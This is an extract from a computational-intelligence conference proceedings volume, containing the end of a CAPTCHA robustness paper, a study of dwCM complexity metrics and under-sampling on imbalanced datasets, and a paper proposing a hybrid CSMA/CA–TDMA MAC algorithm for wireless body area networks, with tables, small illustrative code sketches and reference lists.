The success rate is very low (almost 0%) in both cases: 0.19% for images without perturbation and 0% for images with perturbation, so the CNN's prediction of the proposed CAPTCHA is wrong most of the time. The maximum recognition rate is also very small: 39.48% for images without perturbation and 29.82% with perturbation, which means that on average only one or two characters are recognized exactly in a few CAPTCHAs. Hence, it is demonstrated that the proposed Spiral CAPTCHA is robust against recognition attacks and is practically usable.
References
1. Von Ahn, L., Blum, M., Hopper, N. J., & Langford, J. (2003). CAPTCHA: Using hard AI problems for security. In Advances in Cryptology—EUROCRYPT 2003 (pp. 294–311).
2. Bursztein, E., Martin, M., & Mitchell, J. (2011). Text-based CAPTCHA strengths and weaknesses. In Proceedings of the 18th ACM Conference on Computer and Communications Security—CCS '11 (p. 125).
3. Lee, L. Y., & Hsu, H. C. (2011). Usability study of text-based CAPTCHAs. In Displays (pp
81–86).
4. Tang, M., Gao, H., Zhang, Y., Liu, Y., Zhang, P., & Wang, P. (2018). Research on deep
learning techniques in breaking text-based Captchas and designing image-based Captcha. IEEE
Transactions on Information Forensics and Security, 2522–2537.
5. Yan, J., Salah, A., & Ahmad, E. (2011). Captcha perspective. In Computer (pp 54–60).
6. Yan, J., & Ahmad El, S. A. (2009). CAPTCHA security: A case study. IEEE Security & Privacy,
22–28.
7. Chalil, K., Greenstein, S. J., & Horan, K. (2019). International journal of industrial ergonomics
empirical studies to investigate the usability of text- and image-based CAPTCHAs. Interna-
tional Journal of Industrial Ergonomics, 200–208.
8. Bursztein, E., Aigrain, J., Moscicki, A., & Mitchell, C. J. (2014). The end is nigh: Generic
solving of text-based CAPTCHAs. In Usenix Woot (pp. 3).
9. Szegedy, C., Bruna, J., Erhan, D., & Goodfellow, I. (2014). Intriguing properties of neural
networks. In arXiv:1312.6199[cs.CV] (pp. 1–10).
10. Osadchy, M., Hernandez-Castro, J., Gibson, S., Dunkelman, O., & Perez-Cabo, D. (2017).
No bot expects the deep CAPTCHA! Introducing immutable adversarial examples, with
applications to CAPTCHA generation. Transactions on Information Forensics and Security,
2640–2653.
11. Lin, D., Lin, F., Lv, Y., Cai, F., & Cao, D. (2018). Chinese character CAPTCHA recognition
and performance estimation via deep neural network. Neurocomputing, 11–19.
12. Roshanbin, N., & Miller, J. (2016). ADAMAS: Interweaving unicode and color to enhance
CAPTCHA security. Future Generation Computer Systems, 289–310.
13. Nguyen, D. V., Chow, W. Y., & Susilo, W. (2014) On the security of text-based 3D CAPTCHAs.
Computer & Security, 84–99.
14. Schryen, G., Wagner, G., & Schlegel, A. (2016). Development of two novel face-recognition
CAPTCHAs: A security and usability study. Computers & security, 95–116.
15. Lee, S. J., & Hsieh, H. M. (2013). Preserving user-participation for insecure network
communications with CAPTCHA and visual secret sharing technique. IET Networks, 81–91.
16. Hernandez-Castro, J. C., Moreno, R. D. M., & Barrero, F. D. (2015). Using JPEG to measure
image continuity and break capy and other puzzle CAPTCHAs. IEEE Internet Computing,
46–53.
17. Gao, H., Tang, M., Liu, Y., Zhang, P., & Liu, X. (2017). Research on the security of microsoft’s
two-layer Captcha. Transactions on Information Forensics and Security, 1671–1685.
18. Zhu, B. B., Yan, J., Bao, G., Yang, M., & Xu, N. (2014). Captcha as graphical passwords—A
new security primitive based on hard AI problems. Transactions on Information Forensics and
Security, 891–904.
19. Beheshti, S. R. M. S., Liatsis, P., & Rajarajan, M. (2017). A CAPTCHA model based on visual
psychophysics: Using the brain to distinguish between human users and automated computer
bots. In Computers & security, 596–617.
20. Ogiela, R. M., Krzyworzeka, N., & Ogiela, L. (2018). Application of knowledge-based cogni-
tive CAPTCHA in cloud of things security. In Concurrency and Computation: Practice and
Experience, 30, e4769. https://doi.org/10.1002/cpe.4769
21. Khattar, S., & Rama Krishna, C. (2020). Adversarial attack to fool object detector. Journal of
Discrete Mathematical Sciences and Cryptography, 547–562.
22. Wang, P., Gao, H., Shi, Z., Yuan, Z., & Hu, J. (2020). Simple and easy: Transfer learning-based
attacks to text CAPTCHA. IEEE Access, 1–1.
23. Kirkbride, P., Dewan, A. A. M., & Lin, F. (2020). Game-like Captchas for intrusion detection. In International Conference on Cyber Science and Technology Congress (pp. 312–315).
24. Noury, Z., & Rezaei, M. (2020). Deep-CAPTCHA: A deep learning based CAPTCHA solver
for vulnerability assessment. arXiv:2006.08296
25. Jafar, A. A., Ambeshwar, K., Omar, A. A., & Manikandan, R. (2019). Efficient approaches for
prediction of brain tumor using machine learning techniques. Indian Journal of Public Health
Research & Development, 267–272.
26. Aditya, K., Deepak, G., Nhu, G. N., Ashish, K., Babita, P., & Prayag, T. (2019). Sound clas-
sification using convolutional neural network and tensor deep stacking network. IEEE Access,
7717–7727.
Predicting Classifiers Efficacy in Relation
with Data Complexity Metric Using
Under-Sampling Techniques
Abstract In imbalanced classification tasks, the training datasets may also suffer from other problems such as class overlapping, small disjuncts, and classes of low density. In such situations, learning for the minority class is imprecise. Data complexity metrics help identify the relationship between a classifier's learning accuracy and dataset characteristics. This paper presents an experimental study on imbalanced datasets in which the dwCM complexity metric is used to group the datasets by complexity level, after which the behavior of under-sampling-based pre-processing techniques is analyzed for these different groups of datasets. Experiments are conducted on 22 real-life datasets with different levels of imbalance, class overlapping, and class density. The experimental results show that the groups formed using the dwCM metric can better explain the difficulty of imbalanced datasets and help predict the response of the classifiers to the under-sampling algorithms.
1 Introduction
A vital issue that has been acknowledged widely in machine learning community is of
skewed datasets, that is, the number of samples of one class (called as majority class)
outperforms the number of samples in the other class(es) (called as minority class).
Such skewed datasets are referred as imbalanced datasets and the problem thus called
as class imbalance problem. The class imbalance problem causes difficulty for many
classifying algorithms since the classifiers are often biased toward the majority class
[1]. Many methods have been proposed to deal with this problem [2–9]. However,
studies suggest that the class imbalance is not only responsible for the significant
degradation of the performance on individual classes but also there are certain other
internal factors of the dataset that when occurs together with the class imbalance can
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 85
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_7
86 D. Singh et al.
lead to a serious drop in classifier accuracy, especially for the minority class. These internal difficulty factors are small disjuncts, small dataset size, overlap between the minority and majority classes, and class separability. Recently, researchers have started using data complexity metrics to describe the difficulty factors of datasets in classification problems [10–18]. These metrics try to quantify different aspects or sources of data particularities that are considered difficult for the classification task [10].
However, the existing complexity metrics do not work well for imbalanced datasets. In [19], the authors proposed the complexity metrics wCM and dwCM for imbalanced datasets. Through a series of experiments, we showed that these metrics help identify the difficulty level of an imbalanced dataset and thus prove useful for deciding whether class-balancing algorithms are required to improve the performance of the base classifiers.
In this paper, we have used the dwCM complexity metric to inspect the association between the poor efficacy of classifiers and the intrinsic features of the dataset. Our contributions are: (a) estimating the difficulty level of imbalanced datasets using dwCM, and (b) exploring the competence of different under-sampling algorithms to deal with the internal data factors. In order to study the impact of dataset complexity on the performance of classifiers using under-sampling pre-processing methods, we grouped the datasets on the basis of the dwCM complexity metric. We chose five dwCM ranges for our comparisons, defined as: dwCM ≤ 20%, 21% ≤ dwCM ≤ 30%, 31% ≤ dwCM ≤ 40%, 41% ≤ dwCM ≤ 50%, and dwCM > 50%.
The rest of the paper is organized as follows. Section 2 presents the related works
for data complexity metrics. Section 3 explains the proposed work for this paper.
Section 4 discusses the experimental study and the results obtained for the under-
sampling techniques applied on different groups of datasets. Section 5 provides the
conclusion of this paper.
2 Related Works
The data complexity metrics quantify particular aspects of a dataset, which helps in selecting an appropriate classification algorithm. Basu and Ho [10] studied the relationship between overall classification performance and the intrinsic characteristics of data, and proposed a taxonomy of data complexity metrics that served as a keystone for categorizing data mining problems. Several other studies [20, 21] have investigated the use of these metrics to analyze classification problems.
On the other hand, most studies [16–18, 22–25] have shown that the existing data complexity metrics perform poorly in imbalanced scenarios. Recently, some metrics have therefore been proposed [16, 19, 22, 24, 25] for assessing the complexity of imbalanced datasets. A scatter-matrix-based class separability complexity metric for imbalanced datasets was proposed by Xing et al. [24]. Another metric for imbalanced datasets, based on a k-nn approach, was given by Anwar et al. [16]. Further, Fernandez et al. [17] suggested a method based on feature selection and instance selection to overcome class overlap and class imbalance. Diez-Pastor et al. [26] used complexity metrics to predict data complexity intervals for which some diversity-enhancing techniques may improve the results of an ensemble method. Barella et al. [22] presented three complexity metrics for imbalanced datasets, adapted from well-known complexity metrics by regarding each class individually.
3 Proposed Work
In this paper, we study the relationship between the dwCM complexity metric and classifiers with and without under-sampling-based pre-processing methods. To study the impact of dataset complexity on classifier performance, we grouped the datasets on the basis of their dwCM complexity metric values (we have used the datasets and the dwCM metric values calculated in [19]). Based on these previously computed values, the dwCM ranges considered in this paper are defined as: dwCM ≤ 20% (not complex), 21% ≤ dwCM ≤ 30% (very less complex), 31% ≤ dwCM ≤ 40% (less complex), 41% ≤ dwCM ≤ 50% (complex), and dwCM > 50% (highly complex).
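The grouping step above can be sketched as a simple threshold function. The dwCM values themselves come from [19]; the helper below is an illustrative sketch, not code from the paper:

```python
def dwcm_group(dwcm_percent):
    """Map a dataset's dwCM value (in percent) to the complexity group
    used in this study."""
    if dwcm_percent <= 20:
        return "not complex"
    if dwcm_percent <= 30:
        return "very less complex"
    if dwcm_percent <= 40:
        return "less complex"
    if dwcm_percent <= 50:
        return "complex"
    return "highly complex"
```

Applying this function to the 22 datasets yields the five groups whose results are reported in Tables 1 and 2.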
In this study, we have considered four base classifiers to evaluate dataset complexity: k-nearest neighbor (k-nn) with k = 3, classification tree (CT), support vector machine (SVM) with a linear kernel, and logistic regression (LR). All four classifiers are executed using the Matlab Classification Learner app. The under-sampling algorithms used in this paper are Tomek links (Tk-Links) [27], condensed nearest neighbor (CNN) [28], one-sided selection (OSS) [29], and neighborhood cleaning rule (NCL) [30]. To study the effect of these under-sampling algorithms and to measure classifier performance for the different dataset groups, we use the sensitivity measure, because it provides information about the proper classification of the minority class; the specificity measure, to calculate the correct accuracy for the majority class; and the accuracy measure, for the overall accuracy of the classifiers.
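The three evaluation measures reduce to simple confusion-matrix ratios; a minimal sketch, treating the minority class as the positive class, is:

```python
def binary_rates(y_true, y_pred, minority=1):
    """Sensitivity (minority-class recall), specificity (majority-class
    recall), and overall accuracy from binary predictions."""
    tp = sum(t == minority and p == minority for t, p in zip(y_true, y_pred))
    tn = sum(t != minority and p != minority for t, p in zip(y_true, y_pred))
    fp = sum(t != minority and p == minority for t, p in zip(y_true, y_pred))
    fn = sum(t == minority and p != minority for t, p in zip(y_true, y_pred))
    sensitivity = tp / (tp + fn)        # recall on the minority class
    specificity = tn / (tn + fp)        # recall on the majority class
    accuracy = (tp + tn) / len(y_true)  # overall correctness
    return sensitivity, specificity, accuracy
```

On imbalanced data, accuracy alone can look high while sensitivity is poor, which is why all three measures are reported separately in the tables below.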
4 Experimental Results
Table 1 Experimental results consisting of sensitivity, specificity and accuracy for four classifiers
on the original imbalanced datasets divided into different categories using dwCM complexity metric
Classifier  Group (dwCM %)  Sensitivity  Specificity  Accuracy
k-nn <20 0.9643 (0.035) 0.995 (0.01) 0.9845 (0.02)
20–30 0.73 (0.059) 0.92 (0.09) 0.9045 (0.11)
31–40 0.577 (0.11) 0.9525 (0.069) 0.86475 (0.073)
41–50 0.5563 (0.048) 0.9451 (0.074) 0.901 (0.12)
>50 0.2666 (0.12) 0.9226 (0.06) 0.8342 (0.11)
CT <20 0.9262 (0.11) 0.9796 (0.025) 0.96525 (0.05)
20–30 0.6268 (0.003) 0.934 (0.08) 0.8885 (0.134)
31–40 0.6748 (0.16) 0.9048 (0.09) 0.872 (0.11)
41–50 0.5869 (0.07) 0.9468 (0.07) 0.9093 (0.12)
>50 0.2943 (0.24) 0.9079 (0.08) 0.8291 (0.103)
SVM <20 0.9058 (0.12) 0.978 (0.044) 0.9585 (0.06)
20–30 0.6268 (0.003) 0.9028 (0.098) 0.8645 (0.14)
31–40 0.5725 (0.003) 0.9157 (0.098) 0.8465 (0.14)
41–50 0.0388 (0.067) 0.9947 (0.009) 0.913 (0.13)
>50 0.0809 (0.13) 0.9709 (0.04) 0.8419 (0.11)
LR <20 0.9276 (0.107) 0.9691 (0.04) 0.96 (0.05)
20–30 0.6125 (0.018) 0.9201 (0.09) 0.8705 (0.14)
31–40 0.5925 (0.11) 0.9168 (0.08) 0.8525 (0.001)
41–50 0.3703 (0.05) 0.965 (0.063) 0.9037 (0.12)
>50 0.2125 (0.19) 0.9563 (0.04) 0.8431 (0.09)
Table 1 (second column) shows the different complexity groups used in this study; for every group, the average sensitivity, specificity, and accuracy values are shown along with the standard deviations. As column 3 of Table 1 shows, for the dataset groups 31% ≤ dwCM ≤ 40%, 41% ≤ dwCM ≤ 50%, and dwCM > 50%, the sensitivity values decrease with increasing complexity. For the dwCM > 50% group, sensitivity is below 0.30 for the k-nn, CT, and LR classifiers and is worst for the SVM classifier (0.08), whereas for the dwCM < 20% and 21% ≤ dwCM ≤ 30% groups, the sensitivity values are good (more than 0.90 for all classifiers in the dwCM < 20% group, and more than 0.60 for all classifiers in the 21% ≤ dwCM ≤ 30% group) without applying any pre-processing algorithm. It can be observed from these results that the behavior of classifiers on less complex datasets is better and more uniform than on categories of higher complexity: in the dwCM < 20% group, almost all classifiers seem robust to the imbalance problem, while SVM and LR performance rapidly degrades with increasing complexity.
5 Conclusion
Table 2 Experimental results consisting of sensitivity, specificity and accuracy for four classifiers
after applying under-sampling algorithms on the original datasets divided into different categories
using the dwCM complexity metric
Classifier Datasets groups based on dwCM (%) Under-sampling algorithm Sensitivity Specificity Accuracy
k-nn <20 OSS 0.9775 (0.045) 0.994 (0) 0.9818 (0.028)
20–30 OSS 0.905 (0.19) 0.86 (0.14) 0.87 (0.24)
31–40 NCL 0.7855 (0.08) 0.8625 (0.09) 0.8255 (0.09)
41–50 NCL 0.8723 (0.13) 0.7417 (0.14) 0.8637 (0.15)
>50 NCL 0.7411 (0.09) 0.7028 (0.06) 0.584 (0.22)
CT <20 CNN 0.9775 (0.045) 0.9875 (0.025) 0.9838 (0.03)
20–30 NCL 0.9357 (0.13) 0.9438 (0.11) 0.9405 (0.11)
31–40 OSS 0.7725 (0.18) 0.8897 (0.02) 0.8005 (0.11)
41–50 NCL 0.7567 (0.17) 0.769 (0.11) 0.7643 (0.13)
>50 NCL 0.6856 (0.06) 0.6532 (0.04) 0.6698 (0.04)
SVM <20 NCL 0.97 (0.045) 0.97 (0.05) 0.9598 (0.063)
20–30 OSS 0.97 (0.06) 0.843 (0.19) 0.8205 (0.27)
31–40 NCL 0.7639 (0.096) 0.8797 (0.14) 0.7763 (0.12)
41–50 NCL 0.812 (0.12) 0.8547 (0.13) 0.7927 (0.13)
>50 NCL 0.6731 (0.09) 0.6711 (0.13) 0.6494 (0.08)
LR <20 CNN 0.9775 (0.045) 0.9875 (0.025) 0.9685 (0.063)
20–30 NCL 0.83 (0.24) 0.83 (0.22) 0.775 (0.336)
31–40 Tk_Link 0.7195 (0.13) 0.7943 (0.14) 0.757 (0.12)
41–50 OSS 0.7527 (0.07) 0.7873 (0.13) 0.7693 (0.09)
>50 NCL 0.5989 (0.16) 0.7566 (0.07) 0.6739 (0.07)
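The sensitivity, specificity, and accuracy columns in Tables 1 and 2 follow the standard confusion-matrix definitions; a minimal sketch with illustrative counts, not taken from the paper's datasets:

```python
def classification_metrics(tp, fn, tn, fp):
    """Sensitivity, specificity and accuracy from confusion-matrix counts."""
    sensitivity = tp / (tp + fn)          # true-positive rate on the minority class
    specificity = tn / (tn + fp)          # true-negative rate on the majority class
    accuracy = (tp + tn) / (tp + fn + tn + fp)
    return sensitivity, specificity, accuracy

# Illustrative imbalanced split: 10 minority vs. 90 majority examples.
sens, spec, acc = classification_metrics(tp=6, fn=4, tn=85, fp=5)
```

With such an imbalance, accuracy stays high even when sensitivity is poor, which is why the tables report all three measures.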
References
1. Branco, P., Torgo, L., & Ribeiro, R. P. (2016). A survey of predictive modeling on imbalanced
domains. ACM Computing Surveys, 49(2), 1–50.
2. Gosain, A., Saha, A., & Singh, D. (2016). Analysis of sampling based classification techniques
to overcome class imbalancing. In Proceedings of the 3rd international conference on computing
for sustainable global development (INDIACom) (pp. 7320–7326). IEEE.
3. Chawla, N. V., Bowyer, K. W., Hall, L. O., & Kegelmeyer, W. P. (2002). Smote: Synthetic
minority over-sampling technique. The Journal of Artificial Intelligence Research, 16, 321–357.
4. Estabrooks, A., Jo, T., & Japkowicz, N. (2004). A multiple resampling method for learning
from imbalanced data sets. Computational Intelligence, 20(1).
5. García, S., & Herrera, F. (2009). Evolutionary undersampling for classification with imbalanced
datasets: Proposals and taxonomy. Evolutionary Computation, 17, 275–306.
6. Anand, R., Mehrotra, K., Mohan, C., & Ranka, S. (1993). An improved algorithm for neural
network classification of imbalanced training sets. IEEE Transactions on Neural Networks, 4, 962–969.
7. Bruzzone, L., & Serpico, S. (1997). Classification of imbalanced remote-sensing data by neural
networks. Pattern Recognition Letters, 18, 1323–1328.
8. Domingos, P. (1999). Metacost: A general method for making classifiers cost sensitive. In
Proceedings of fifth ACM SIGKDD international conference on knowledge discovery and data
mining, KDD ’99 (pp. 155–164). ACM, New York.
9. Zhou, Z.-H., & Liu, X.-Y. (2006). Training cost-sensitive neural networks with methods
addressing the class imbalance problem. IEEE Transactions on Knowledge and Data Engineering,
18, 63–77.
10. Basu, M., & Ho, T. K. (2006). Data complexity in pattern recognition. Advanced Information
and Knowledge Processing. Springer.
11. Bernado-Mansilla, E., & Ho, T. K. (2005). Domain of competence of XCS classifier system
in complexity measurement space. IEEE Transactions on Evolutionary Computation, 9(1),
82–104.
12. Li, Y., & Dong, M. (2005). Classifiability-based omnivariate decision trees. IEEE
Transactions on Neural Networks, 16(6), 1547–1560.
13. Baumgartner, R., & Somorjai, R. L. (2006). Data complexity assessment in undersampled
classification of high-dimensional biomedical data. Pattern Recognition Letters, 12, 1383–
1389.
14. Yu, H., Ni, J., Xu, S., Qin, B., & Jv, H. (2014). Estimating harmfulness of class imbalance by
scatter matrix based class separability measure. Intelligent Data Analysis, 18, 203–216.
15. García, S., Cano, J. R., Bernado-Mansilla, E., & Herrera, F. (2009). Diagnose of effective
evolutionary prototype selection using an overlapping measure. International Journal of Pattern
Recognition and Artificial Intelligence, 23(8), 2378–2398.
16. Anwar, N., Jones, G., & Ganesh, S. (2014). Measurement of data complexity for classification
problems with unbalanced data. Statistical Analysis and Data Mining, 7(3), 194–211.
17. Fernandez, L.M., Canedo, V.B., & Betanzos, A.A. (2016). Data complexity measures for
analyzing the effect of SMOTE over microarrays. In Proceedings European Symposium on
artificial neural networks, computational intelligence and machine learning (pp. 289–294).
18. Fernandez, L. M., Canedo, V. B., & Betanzos, A. A. (2017). Can classification performance
be predicted by complexity measures? A study using microarray data. Knowledge and
Information Systems, 51(3), 1067–1090.
19. Singh, D., Gosain, A., & Saha, A. (2020). Weighted k-nearest neighbor data complexity metrics
for imbalanced datasets. Statistical Analysis and Data Mining. https://doi.org/10.1002/sam.11463
20. Jo, T., & Japkowicz, N. (2004). Class imbalances versus small disjuncts. ACM SIGKDD
Explorations Newsletter, 6(1), 40–49.
21. Denil, M., Trappenberg, T.P. (2010). Overlap versus imbalance. In Canadian conference on AI
(pp. 220–231).
92 D. Singh et al.
22. Barella, V. H., Garcia, L. P. F., De Souto, M. P., Lorena, A. C., & De Carvalho, A. (2018). Data
complexity measures for imbalanced classification tasks. In Proceedings international joint
conference on neural networks (IJCNN) (pp. 1–8). Rio de Janeiro. https://doi.org/10.1109/IJCNN.2018.8489661
23. Brun, A. L., Britto, A. S., Jr., Oliveira, L. S., Enembreck, F., & Sabourin, R. (2018). A framework
for dynamic classifier selection oriented by the classification problem difficulty. Pattern
Recognition, 76, 175–190.
24. Xing, Y., Cai, H., Cai, Y., Hejlesen, O., & Toft, E. (2013). Preliminary evaluation of classification
complexity measures on imbalanced data. In Proceedings of the Chinese intelligent automation
conference (pp. 189–196).
25. Yu, H., Ni, J., Xu, S., Qin, B., & Jv, H. (2014). Estimating harmfulness of class imbalance by
scatter matrix based class separability measure. Journal Intelligent Data Analysis, 18, 203–216.
26. Diez-Pastor, J. F., Rodriguez, J. J., Garcia-Osorio, C. I., & Kuncheva, L. I. (2015). Diversity
techniques improve the performance of the best imbalance learning ensembles. Information
Sciences, 325, 98–117.
27. Tomek, I. (1976). Two modifications of CNN. IEEE Transactions on Systems, Man, and
Cybernetics, SMC-6, 769–772.
28. Hart, P. E. (1968). The condensed nearest neighbour rule. IEEE Transactions on Information
Theory, IT-14, 515–516.
29. Kubat, M., & Matwin, S. (1997). Addressing the curse of imbalanced datasets: one sided
sampling. In Proceedings of 14th international conference on machine learning (pp. 179–186).
Nashville, TN.
30. Laurikkala, J. (2001). Improving identification of difficult small classes by balancing class
distribution. Technical Report A-2001-2, University of Tampere.
Enhanced Combined Multiplexing
Algorithm (ECMA) for Wireless Body
Area Network (WBAN)
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 93
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_8
94 P. Rani et al.
1 Introduction
A WBAN consists of an on-body coordinator and different wearable sensors that monitor the
vital signs of the human body. The MAC protocol [1] in a WBAN defines the set of rules that
regulates the activities of the sensing equipment in the network. The sensing devices are
responsible for transmitting and receiving data packets, sleeping, and idling. If the MAC
protocol is not designed properly, it causes energy loss in wireless body area network devices
under many conditions, e.g., overhearing, collisions, over-emitting, idling, and on–off
transitions. In general, MAC protocols are classified into two categories:
contention-free and contention-based MAC protocols.
In a contention-free MAC protocol, time is broken into frames, which are further divided
into time slots. A time slot is assigned to a device for packet transmission. Each device may
transmit packets only in its allotted time slot, and no other device is allowed to transmit
during that slot. This approach eliminates
the collision problem inherent in the CSMA protocol.
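The frame-and-slot idea can be illustrated with a toy slot table; the node names and slot count here are invented for the example:

```python
def tdma_schedule(nodes, slots_per_frame):
    """Assign each node a fixed slot index; unused slots stay empty.

    A node may transmit only in its own slot, so slot owners never collide.
    """
    if len(nodes) > slots_per_frame:
        raise ValueError("more nodes than slots in one frame")
    schedule = {slot: None for slot in range(slots_per_frame)}
    for slot, node in enumerate(nodes):
        schedule[slot] = node
    return schedule

# Hypothetical body sensors sharing a five-slot frame.
frame = tdma_schedule(["ecg", "glucose", "temp"], slots_per_frame=5)
```

The fixed assignment is what makes the scheme collision free, and also why it scales poorly: adding a node needs a frame with a spare slot.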
In a contention-based MAC protocol, all sensor devices share the medium for data transfer.
Performance depends on the channel access probabilities of all sensor devices in the network.
We propose to blend the strengths of two algorithms, CSMA/CA and TDMA. We apply TDMA
scheduling to low-priority nodes and to nodes that have not transmitted frames for a long
period of time; the TDMA schedule can be placed between the contention phases of the
superframe. The remaining nodes follow the CSMA/CA mechanism, in which a node must
perform carrier sensing to make sure that the channel is free
before transmission.
2 Related Works
WBANs are broadly used in healthcare applications, and the healthcare field is very
sensitive; therefore, the MAC protocols proposed for a WBAN require additional care. Many
MAC protocols have been proposed, and it has been noted that the TDMA [2] and CSMA
mechanisms are the best known MAC protocols [3] for a WBAN. TDMA was favored in
earlier work, as it gives improved performance under unsaturated traffic conditions. A sink
node can be placed at the waist, with sensors for glucose level and ECG placed close to it.
These nodes carry significant patient data, so high trustworthiness must be preserved with
respect to node failure and
longer lifetime. The sensors transmit the information sensed from the environment to the
sink via forwarder nodes; this preserves the energy of the nodes and keeps the network
working for longer periods. Based on a cost function, each node decides whether or not to
become a forwarder node.
A node with the minimum cost function is preferred as a forwarder. The forwarder node
aggregates data and forwards it to the sink, and assigns TDMA-based time slots to its
descendant nodes; all successor nodes transmit their data to the forwarder node in their own
scheduled time slots. Fang and Dutkiewicz [4] proposed an energy-efficient MAC protocol
(BodyMAC). It uses flexible bandwidth allocation to enhance node energy effectiveness by
reducing the probability of packet collisions. BodyMAC depends on a downlink/uplink
method in which the contention-free part of the uplink subframe is totally collision free.
Liu, Yan, and Chen [5] proposed a context-aware MAC protocol using a hybrid of
contention-based and TDMA multi-access methods to deal with lossy channels by adaptively
modifying the MAC frame structure. Schedule-based and polling-based techniques are also
used to manage periodic and emergency traffic requirements. References [6, 7] proposed a
TDMA-based MAC protocol design, simulated with 24 nodes; this technique tries to improve
energy utilization with a TDMA scheme. In the unscheduled wake-up process, all nodes in
the network have independent wake-up plans. Since they have no clue about the wake-up
plans of other devices, carrier sensing (CS) is used to avoid collisions.
An enhanced MAC protocol [8] was proposed to prolong network lifetime with a focus on
end-to-end transmission delay. To improve the lifetime, the authors analyze different models
and implement cross-layer collaboration between the nodes so that the lifetime can be
improved.
The authors of [9] proposed a task-based framework that divides energy consumption into
five energy-consuming parts; based on the observed requests, every node takes a decision for
the next task. Application efficiency and energy consumption can be traded off with
reference to a reward function, thereby improving performance; performance can be further
improved by exchanging data among neighboring nodes.
3 Proposed Model
The MAC protocol in a WBAN defines the set of rules that controls the behavior of the
sensor devices in the network. Transmitting data packets, receiving data packets, idling, and
sleeping are the main activities of a sensor device. If the MAC protocol is not designed well,
energy is wasted through, e.g., collisions, overhearing, idling, over-emitting, and on–off
transitions. Quality
of service attributes are vital for a high-quality MAC protocol in a WBAN. Since a vast
amount of energy is required to transmit data over the wireless medium, and the
communication requirement is fulfilled by the MAC protocol, it is important to implement it
well for the network. Poor throughput and energy wastefulness make CSMA/CA less
suitable for a WBAN. On the other hand, the advantage of TDMA is that it is collision free,
as its slots are fixed, but it suffers from one major drawback: scalability. That is why we
have combined the properties of both CSMA/CA and TDMA to improve MAC protocol
performance. In the superframe, the TDMA schedule is placed between the contention
phases for the nodes that have been idle the longest, while the remaining nodes follow
CSMA/CA. Our proposed algorithm decides which channel access mechanism, CSMA/CA
or TDMA, each node uses, and this further increases the quality of service. A beacon is sent
by the coordinator in every beacon period, or superframe. In contended allocations,
communication is started by nodes in the following sequence: EAP1, RAP1, up to n EAPs
and n RAPs, respectively (Fig. 1).
Let n denote the number of sensor nodes, and let di denote the delay of node i, where
i = 1, …, n. The average delay is calculated in the first round, and the average delay of the
same node is calculated again in the second round. The procedure continues while the
node's delay has not converged, and is repeated for the given number of nodes.
Nodes with the same priority are grouped, and the average delay of each similar-priority
group is calculated. Then the average delay di of every node is compared with the average
delay of its similar-priority group. If a node's average delay is less than or equal to the
group's average delay, CSMA/CA is allocated to that node; if it is larger, TDMA is allocated.
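The grouping-and-comparison rule above can be sketched in code; this is a minimal illustration of the assignment logic only, with hypothetical node IDs, priorities, and delay values (the paper's actual delays come from MATLAB simulation):

```python
from collections import defaultdict
from statistics import mean

def assign_channel_access(nodes):
    """nodes: list of (node_id, priority, avg_delay) tuples.

    Nodes whose average delay is at most their priority group's mean delay
    keep CSMA/CA; the slower nodes in each group are moved to TDMA slots.
    """
    by_priority = defaultdict(list)
    for node_id, priority, delay in nodes:
        by_priority[priority].append((node_id, delay))

    assignment = {}
    for members in by_priority.values():
        group_mean = mean(delay for _, delay in members)
        for node_id, delay in members:
            assignment[node_id] = "CSMA/CA" if delay <= group_mean else "TDMA"
    return assignment

# Hypothetical example: two priority groups of two nodes each.
access = assign_channel_access([
    (1, "high", 2.0), (2, "high", 5.0),   # group mean 3.5
    (3, "low", 1.0), (4, "low", 1.0),     # group mean 1.0
])
```

Only node 2 exceeds its group's mean delay here, so it alone is moved to a TDMA slot.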
GTSs, i.e., guaranteed time slots, are announced in the beacon frame at the start of every
superframe by the coordinator. If a node's average delay is less than or equal to its
similar-priority group's average delay, CSMA/CA is allocated to that node; if it is larger,
TDMA is allocated; otherwise, CSMA/CA is used during the CAP for transmitting the data.
When GTS slots have been assigned to a node, it remains idle for the duration of the CAP
and sends its data packets in the CFP period; otherwise, transmission in the CAP period is
deferred. After transmitting during its assigned GTS slot, a node waits for the successive
beacon frames. Sensor devices or nodes remain in the idle state
after dispatching a packet in the CAP if no extra packets remain in the buffer; otherwise,
CSMA/CA is started again. If the CAP length is not sufficient for transmitting the packets,
or the CAP has ended for a given superframe, the nodes' transmissions are deferred. Figure 2
shows in detail how CSMA and TDMA operate once a node has been assigned its channel
access mechanism.
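A minimal sketch of the per-superframe decision described above; the function name and time units are hypothetical, and real IEEE 802.15.6 timing is far more detailed:

```python
def transmission_phase(has_gts, cap_time_left, packet_airtime):
    """Decide where a node sends its pending packet in the current superframe.

    A node holding a GTS stays idle through the CAP and transmits in the CFP;
    otherwise it contends in the CAP, deferring to the next superframe when
    the remaining CAP time cannot fit the packet.
    """
    if has_gts:
        return "CFP"        # guaranteed slot, no contention needed
    if cap_time_left >= packet_airtime:
        return "CAP"        # contend now with CSMA/CA
    return "defer"          # CAP too short: wait for the next beacon
```

The three return values correspond directly to the three cases in the text: GTS holder, successful CAP contention, and deferred transmission.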
In this section, the performance of the CSMA/CA mechanism and our proposed model is
analyzed using the parameters and conditions of the IEEE 802.15.6 standard [10]. The main
goal of this paper is to enhance the quality of service in wireless body area networks so that
the amount of energy consumed by the WBAN is minimized. Our proposed model decides
which sensor nodes are assigned TDMA and which CSMA/CA, which further increases
WBAN performance. MATLAB simulation is used to generate the results.
To obtain the average delay, we simulated our algorithm 30 times for 10 nodes, as shown in
Fig. 3. The results show that under our proposed model the delay is reduced only for some
of the nodes, while for the rest the delay increases. Each time the simulator runs, the
allotment of CSMA/CA and TDMA slots to nodes differs. To obtain the average delay, we
also simulated our algorithm 30 times for 20 nodes, as shown in Fig. 4; again, the delay is
reduced only for some nodes and increases for the others. As shown in Fig. 3, CSMA is
allocated to nodes 2, 3, 4, 6, 7, 8, 10, 14, 15, 17, 19, and 20, whose delay under the proposed
model is larger than the CSMA delay. In contrast, TDMA is allocated to nodes 5, 9, 11, 12,
13, 16, and 18, whose delay under the proposed model is less than the CSMA delay. This is
not a major problem because, in practical WBAN applications, only a small number of
sensor nodes are placed on the body.
